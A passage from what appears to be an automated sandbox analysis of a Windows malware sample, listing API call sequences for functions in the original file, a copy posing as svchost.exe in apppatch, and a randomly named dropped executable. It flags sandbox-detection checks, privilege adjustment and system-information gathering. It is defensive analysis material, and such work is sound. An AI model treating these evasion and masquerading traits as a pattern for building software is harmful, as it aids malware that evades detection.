ointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 5_2_008D4B00
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00884B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 6_2_00884B00
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 9_2_02BD4B00
    Contains functionality to compare user and computer (likely to detect sandboxes)
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402D30
    Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,2_2_00403A20
    Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,2_2_00402D30
    Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,2_2_02BB7FD0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02BC5720
    Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,2_2_02BC6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02BD2BB0
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,2_2_02BD2B40
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,2_2_02BBD970
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,2_2_02BB1170
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,2_2_02BD1690
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,2_2_02BB3610
    Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,2_2_02BCCE10
    Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_02BB1660
    Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,2_2_02BD3F50
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,2_2_02BD3CE0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,2_2_02BD1460
    Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,StrStrIA,2_2_02BCADE0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,2_2_02BD25C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_008E6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_008D1170
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,5_2_008DD970
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_008F2BB0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_008F2B40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_008F3CE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_008F1460
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_008F25C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserNameA,memset,StrStrIA,5_2_008EADE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_008F1690
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,5_2_008D3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_008ECE10
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_008D1660
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_008D7FD0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_008E5720
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_008F3F50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_00896CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_00881170
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,6_2_0088D970
